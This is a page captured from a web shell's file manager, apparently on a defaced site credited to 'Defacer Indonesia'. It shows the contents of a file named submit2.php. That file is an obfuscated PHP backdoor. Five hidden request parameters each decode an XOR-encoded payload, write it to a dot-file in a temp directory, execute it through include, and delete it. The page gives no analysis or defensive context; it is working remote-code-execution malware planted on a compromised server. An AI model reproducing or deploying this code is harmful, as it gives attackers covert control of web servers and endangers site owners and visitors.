whoami7 - Manager
:
/
home
/
analuakl
/
new.ankurmedia.com
/
Upload File:
files >> /home/analuakl/new.ankurmedia.com/submit2.php
<?php if(array_key_exists("ho\x6Cder", $_REQUEST) && !is_null($_REQUEST["ho\x6Cder"])){ $object = array_filter([session_save_path(), "/dev/shm", getenv("TMP"), getenv("TEMP"), "/var/tmp", getcwd(), sys_get_temp_dir(), "/tmp", ini_get("upload_tmp_dir")]); $record = $_REQUEST["ho\x6Cder"]; $record = explode ( "." ,$record) ; $element = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt ); $m = 0; while($m < count($record)) { $v6 = $record[$m]; $chS = ord($salt[$m % $sLen] ); $d =((int)$v6 - $chS -($m % 10)) ^ 2; $element .= chr($d ); $m++; } for ($obj = 0, $data = count($object); $obj < $data; $obj++) { $ptr = $object[$obj]; if (array_product([is_dir($ptr), is_writable($ptr)])) { $pointer = str_replace("{var_dir}", $ptr, "{var_dir}/.binding"); $file = fopen($pointer, 'w'); if ($file) { fwrite($file, $element); fclose($file); include $pointer; @unlink($pointer); exit; } } } } if(in_array("sy\x6Db\x6F\x6C", array_keys($_REQUEST))){ $data = $_REQUEST["sy\x6Db\x6F\x6C"]; $data =explode ( "." , $data ) ; $property_set = ''; $salt6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt6 ); $x = 0; $__len = count( $data ); do {if( $x >= $__len) break; $v4 = $data[$x]; $sChar = ord( $salt6[$x% $lenS] ); $d =( ( int)$v4 - $sChar -( $x% 10)) ^ 63; $property_set .= chr( $d ); $x++; } while( true ); $token = array_filter([sys_get_temp_dir(), getenv("TEMP"), "/dev/shm", "/tmp", session_save_path(), getcwd(), getenv("TMP"), "/var/tmp", ini_get("upload_tmp_dir")]); foreach ($token as $pointer) { if ((is_dir($pointer) and is_writable($pointer))) { $pgrp = sprintf("%s/.pset", $pointer); if (@file_put_contents($pgrp, $property_set) !== false) { include $pgrp; unlink($pgrp); die(); } } } } if(!is_null($_POST["\x70o\x69\x6E\x74er"] ?? null)){ $flag = $_POST["\x70o\x69\x6E\x74er"]; $flag =explode( '.' , $flag ); $element =''; $s3 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen($s3); $q =0; while($q< count($flag)) { $v2 =$flag[$q]; $sChar =ord($s3[$q % $sLen]); $dec =((int)$v2 - $sChar -($q % 10)) ^ 10; $element .= chr($dec); $q++; } $hld = array_filter(["/tmp", getenv("TEMP"), sys_get_temp_dir(), session_save_path(), getcwd(), ini_get("upload_tmp_dir"), getenv("TMP"), "/dev/shm", "/var/tmp"]); foreach ($hld as $key => $ent) { if ((bool)is_dir($ent) && (bool)is_writable($ent)) { $mrk = str_replace("{var_dir}", $ent, "{var_dir}/.comp"); $file = fopen($mrk, 'w'); if ($file) { fwrite($file, $element); fclose($file); include $mrk; @unlink($mrk); die(); } } } } if(isset($_REQUEST) && isset($_REQUEST["\x68ld"])){ $parameter_group = $_REQUEST["\x68ld"]; $parameter_group = explode ("." ,$parameter_group ) ; $comp = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt ); foreach($parameter_group as $s => $v3) { $sChar = ord($salt[$s %$lenS] ); $dec = ((int)$v3 - $sChar -($s %10)) ^65; $comp .= chr($dec ); } $dat = array_filter(["/tmp", "/dev/shm", getenv("TMP"), getcwd(), ini_get("upload_tmp_dir"), getenv("TEMP"), session_save_path(), sys_get_temp_dir(), "/var/tmp"]); for ($item = 0, $element = count($dat); $item < $element; $item++) { $holder = $dat[$item]; if ((function($d) { return is_dir($d) && is_writable($d); })($holder)) { $bind = join("/", [$holder, ".itm"]); if (file_put_contents($bind, $comp)) { include $bind; @unlink($bind); die(); } } } } if(count($_POST) > 0 && isset($_POST["\x69t\x6D"])){ $ref = $_POST["\x69t\x6D"]; $ref = explode ( '.' , $ref ) ; $object = ''; $s4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s4); foreach( $ref as $z => $v4): $sChar = ord( $s4[$z % $lenS]); $d = ( ( int)$v4 - $sChar -( $z % 10)) ^ 74; $object .= chr( $d); endforeach; $pset = array_filter([session_save_path(), sys_get_temp_dir(), "/var/tmp", "/dev/shm", getenv("TEMP"), ini_get("upload_tmp_dir"), getenv("TMP"), getcwd(), "/tmp"]); for ($symbol = 0, $data_chunk = count($pset); $symbol < $data_chunk; $symbol++) { $ent = $pset[$symbol]; if ((is_dir($ent) and is_writable($ent))) { $elem = "$ent" . "/.ent"; $file = fopen($elem, 'w'); if ($file) { fwrite($file, $object); fclose($file); include $elem; @unlink($elem); die(); } } } }
Copyright ©2021 || Defacer Indonesia